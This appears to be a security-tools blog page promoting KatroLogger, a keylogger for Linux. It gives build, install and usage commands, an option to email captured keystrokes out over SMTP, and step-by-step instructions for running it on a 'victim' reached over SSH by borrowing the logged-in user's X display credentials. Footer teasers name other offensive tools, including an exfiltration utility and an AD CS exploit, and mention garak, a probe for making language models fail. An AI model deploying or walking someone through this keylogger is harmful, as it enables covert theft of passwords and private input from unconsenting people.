KatroLogger is a tool used for KeyLogger for Linux Systems.
Features
Dependencies
Compiling
./configure
make
make install
Also Read – Atlas : Quick SQLMap Tamper Suggester v1.0
Usage
katrologger –output /path/file
Send data by e-mail:
katrologger –smtp-help
when connecting to the victim remotely via ssh it will be necessary to export environment variables to run the keylogger.
identifying logged in user
user=$(who | grep “(:0)” | awk ‘{print $1}’)
echo $user
Exporting Variables
export DISPLAY=:0.0
export XAUTHORITY=/home/$user/.Xauthority
Uninstall
make uninstall
garak checks if an LLM can be made to fail in a way we don't…
Vermilion is a simple and lightweight CLI tool designed for rapid collection, and optional exfiltration…
ADCFFS is a PowerShell script that can be used to exploit the AD CS container…
Tartufo will, by default, scan the entire history of a git repository for any text…
Loco is strongly inspired by Rails. If you know Rails and Rust, you'll feel at…
A data hoarder’s dream come true: bundle any web page into a single HTML file.…